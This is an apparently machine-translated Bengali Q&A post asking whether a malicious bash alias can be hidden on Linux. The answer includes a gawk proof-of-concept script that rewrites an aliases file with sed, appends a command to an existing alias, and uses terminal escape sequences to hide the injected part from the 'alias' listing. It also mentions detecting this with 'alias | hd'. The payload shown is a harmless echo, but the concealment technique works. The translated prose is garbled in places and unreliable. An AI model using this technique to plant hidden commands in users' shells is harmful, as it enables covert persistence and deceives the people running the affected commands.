কোনও লিনাক্স সিস্টেমে বাশে কোনও দূষিত ওরফে অস্তিত্ব লুকিয়ে রাখা এবং ব্যবহারকারীর দ্বারা তাদের অজান্তেই এটি কার্যকর করা সম্ভব?
কোনও লিনাক্স সিস্টেমে বাশে কোনও দূষিত ওরফে অস্তিত্ব লুকিয়ে রাখা এবং ব্যবহারকারীর দ্বারা তাদের অজান্তেই এটি কার্যকর করা সম্ভব?
উত্তর:
aliasকমান্ডটি যদি ওরফে সংজ্ঞা প্রদর্শন করতে ব্যবহৃত হয় তবে এটি দূষিতর মধ্যে বিদ্যমান উপনামটি সংযুক্ত করে এবং এটি লুকানোর জন্য কার্সার আন্দোলন ব্যবহার করে এটি করা সম্ভব । এটি একটি নিখুঁত বুদ্ধিমান পদ্ধতি নয়, তবে এটি কিছু সময়ের জন্য সনাক্ত করা যেতে পারে। বংশীধ্বনিতুল্য aliasমাধ্যমে hdকোন পালাবার ক্রম (কার্সার আন্দোলন) আপনার alias লেখা আছে কিনা তা আপনাকে দেখাবে। এখানে কীভাবে কোনও দূষিত কমান্ড একটি aliasুকতে পারে তার ধারণার প্রমাণ এখানে রয়েছে:
alias | gawk 'BEGIN {
FS = "[ =\047]"
db = "\\"; sp = db " "; amp = db "&"
sq= "\047"; bell = "\007"; esc = "\033"
}
NR == 3 { len1 = length($2) }
NR == 4 {
alias = $2
orig = gensub(sq, "", "g", substr($0, match($0, "=") + 1))
orig = gensub(" ", db sp, "g", orig)
}
END {
hide = "$" db sq sp "--" sp db "\r" esc "[J" esc "[A" db "\t"
for(i=1; i<len1; i++) {hide = hide esc "[C"}
cmd = "sed -i s/^alias" sp alias ".*/alias" sp alias "=" db sq "echo" sp db bell db db amp db db amp orig db sq hide db sq "/ aliases"
system(cmd)
}'sedকমান্ড মডিফাই একটি ফাইল জায়গায় "alias লেখা" বলা - এই ধরনের একটি বাস্তব স্ক্রিপ্ট গলা জন্য যান এবং তাই দূষিত ওরফে পরের বার মৃত্যুদন্ড কার্যকর হচ্ছে সক্রিয় করা হবে একটি বাস্তব স্ক্রিপ্ট ফাইল পরিবর্তন করবে।hideএকটি আর্গুমেন্টের বিষয়বস্তু দিয়ে কার্যকর করা হবে সুতরাং এটি অনুমেয় যে এই প্রশ্নে উল্লিখিত অনুরূপ একটি ত্রুটি পেতে পারে । এটি প্রভাবিত করার জন্য মূল এবং দূষিত অংশগুলি বিপরীত করা সম্ভব হতে পারে, যদিও এটির সাথে যুক্ত হওয়া যুক্তিগুলিতে হস্তক্ষেপ হবে। উপরের স্ক্রিপ্টে যুক্তিগুলির শেষ চিহ্নিত করার চেষ্টা করা হয়েছে --।&&আপনি একের পরের অংশে পাইপ করতে পারবেন এবং দূষিত স্ক্রিপ্টটিকে (উপরে সরল echoকমান্ড দ্বারা উপস্থাপিত ) ফাংশনটিকে পাসের মাধ্যমে দিয়ে stdinযেতে stdoutহবে যাতে তথ্যটি অতিক্রম করে যাচ্ছেন বা এটির আড়াল করা যায় অন্যান্য পুনঃনির্দেশে হস্তক্ষেপ না করে অস্তিত্ব আরওhideস্ট্রিং তাই বিভিন্ন কার্সার আন্দোলন এবং মূল ওরফে টেক্সট অন্তর্ভুক্ত করা পরিবর্তিত হতে পারে aliasকমান্ড দূষিত অংশ সহ এটা গোপন পরিবর্তে অপরিবর্তিত ওরফে দেখানোর জন্য প্রদর্শিত হবে।. aliases। তারপরে আপনি আক্রান্ত উরফটি ব্যবহার করার চেষ্টা করতে পারেন এবং আপনি যখন করেন তখন কেমন লাগে তা দেখতে পারেন alias|hd।